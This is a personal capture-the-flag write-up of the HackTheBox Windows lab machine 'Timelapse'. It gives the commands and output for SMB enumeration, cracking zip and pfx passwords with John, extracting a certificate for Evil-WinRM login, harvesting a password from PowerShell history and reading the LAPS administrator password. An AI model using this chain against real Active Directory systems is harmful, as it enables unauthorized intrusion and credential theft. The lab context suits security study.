HackTheBox: Timelapse


This is another one of the retired easy boxes that they're making free for a month. Since I have limited time I figured I would just do this one and follow the writeup the entire way through to get it done in a couple hours.

THIS IS A WINDOWS MACHINE! I don't do these often, and don't know shit about privilege escalation in Windows.


First tried full port scan with scripts and version enumeration using the standard

nmap -p- -sC -sV

but this returned the message

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

It does work with sudo, though:

sudo nmap -p- -sC -sV

==I forget exactly why it works with sudo but not otherwise. I know with sudo it doesn't have to complete the three-way TCP handshake, but it must be doing something in addition to that, right? I dont see why not finishing the handshake would cause the target to suddenly respond... Look it up==

We have an absolutely rediculous number of ports open: 1) 53: DNS 2) 88: Kerberos-sec 3) 135: msrpc 4) 139: NETBIOS-ssn 5) 389: LDAP 6) 445: microsoft-ds? 7) 464: kpasswd5? 8) 593: ncacnhttp 9) 636: ldapssl 10) 3268: ldap 11) 3269: globalcatLDAPssl 12) 5986: sslp/http 13) 9389: mc-nmf 14) 49667: msrpc 15) 49673: ncacnhttp 16) 49674: msrpc 17) 49696: msrpc 18) 57189: msrpc

Jesus christ. At this point, due to limited time, Im just going to be following the writeup the entire way. Basically a freebie. Ill still be taking notes here though.

From the nmap scan we see the ==host name is DC01.==


The SMB server allows us to enumerate shares without credentials using

smbclient -L

Of these, three shares allow us anonymous access: 1) Shares 2) SYSVOL 3) NETLOGON

NETLOGON and SYSVOL give us permission denied when running ls.

'Shares,' however, allows us to view its contents. It has 2 directories, "Dev" and "HelpDesk."

Dev has a single file, "winrmbackup.zip". HelpDesk has a few files all starting with "LAPS". I downloaded all of them, but the "winrm_backup.zip" looks like the obvious place to start.

The password-protected zip file

When I try to unzip the ZIP file obtained from the SMB share, I'm prompted for a password. This may be easy to crack. First we run it through zip2john (==what exactly does this do?==) to format it in a way that john can crack, then we run john on it to crack it. If we obtain a password, we can unzip it.

$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 

$ zip2john winrm_backup.zip >> unzippedzip

$ john unzippedzip --wordlist=$ROCK
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx) 

$ unzip winrm_backup.zip                  
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: (supremelegacy)

($ROCK is just the path to rockyou.txt. Its an environment variable I set in .bashrc because I use it so often)

The inflated zip archive contained a file called legacyy_dev_auth.pfx, which file identifies simply as 'data'. There is no printable-character header in the file when examined with hexdump -C. Assumedly this is some kind of auth key, but I need to look up what the .pfx file extension is for.

The .pfx file and gaining remote access

Apparently .pfx files are "Personal Information Exchange" data, which is a "password protected file certificate commonly used for code signing your application". Okay.

According to the writeup, "The output is a PFX file which contains an SSL certificate in PKCS#12 format and a private key. PFX files can be used by WinRM in order to login without a password. Let's extract them from the file." (==How did they know what the file contained and what the format was? Is it just standard for pfx files?==)

$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
Enter Import Password: (supremelegacy)
Mac verify error: invalid password?

So we need a different password than the one found earlier. John has a utility called pfx2john which can be used to convert the pfx file into a hash format that john can crack:

$ pfx2john legacyy_dev_auth.pfx >> pfxhash

$ john pfxhash --wordlist=$ROCK
thuglegacy       (legacyy_dev_auth.pfx)  

Nice... "thuglegacy". Questionable choice, but we have it. Now we can extract the ssl cert from the file as we tried to do earlier...

We also have to extract the cert itself:

$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem       
Enter Import Password: thuglegacy

...beautiful. Now we have a private key and cert, hopefully we can sign into the winrm service with it.

Gaining remote access through WinRM

According to the writeup, port 5986 is often used by WinRM but with SSL rather than unencrypted connection.

Evil-WinRM allows us to pass keys and certs with the -k and -c flags, so we can pass the creds we obtained and hopefully get passwordless access:

$ evil-winrm -i -c cert.pem -k key.pem -S

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami

(Note: The -S flag specifies to use SSL)

Great, we're in.

The first step the writeup takes is to view the user's command history in the "ConsoleHosthistory.txt" file, which is like the Windows equivalent of .bashhistory in linux:

*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *

It looks to me, without really knowing the windows commands here, that the above commands are setting some system password to be "E3R$Q62^12p7PLlC%KWaxuaV".

Yep, I was right. Its creating a WinRM user "svc_deploy" on port 5986 (the SSL WinRM port) with password "E3R$Q62^12p7PLlC%KWaxuaV". We can take these creds and sign in as that user:

$ evil-winrm -i -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami

Now we check what groups this user is part of (this is basically what you would do as soon as you get a new user shell in Linux priv esc too):

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users

The writeup singles out the LAPS_Readers group as being important. LAPS stands for "Local Administration Password Solution" and is used to manage local account passwords of Active Directory computers.

We can use a PowerShell module to retrieve this password from GitHub and upload it through WinRM. The GitHub repo is here: (https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS)

After downloading the repo and moving it to the current working directory of the shell session running evil-winrm on your local machine, you can upload the powershell code directory to the target using evil-winrm:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload AdmPwd.PS


Info: Upload successful!

However, I wasnt able to run the next command in the writeup. I kept getting a CommandNotFound error and was not sure how to troubleshoot it. I switched to a writeup by 0xdf which went a different route, and (from what I can tell) queries the Domain Controller for the admin passwords. This is possible because the system uses LAPS, which stores admin passwords in the domain controller and lets users in the LAPS group read those passwords.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms-mcs-admpwd'

DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName       : dc01.timelapse.htb
Enabled           : True
ms-mcs-admpwd     : K.+GU,7G]Uc6%w]3][Xo9A1,
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :

So we can see that the admin password appears to be ''K.+GU,7G]Uc6%w]3][Xo9A1,"

Next, I assume we try logging in to WinRM as admin with this password?


$ evil-winrm -i -u administrator -p 'K.+GU,7G]Uc6%w]3][Xo9A1,' -S

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami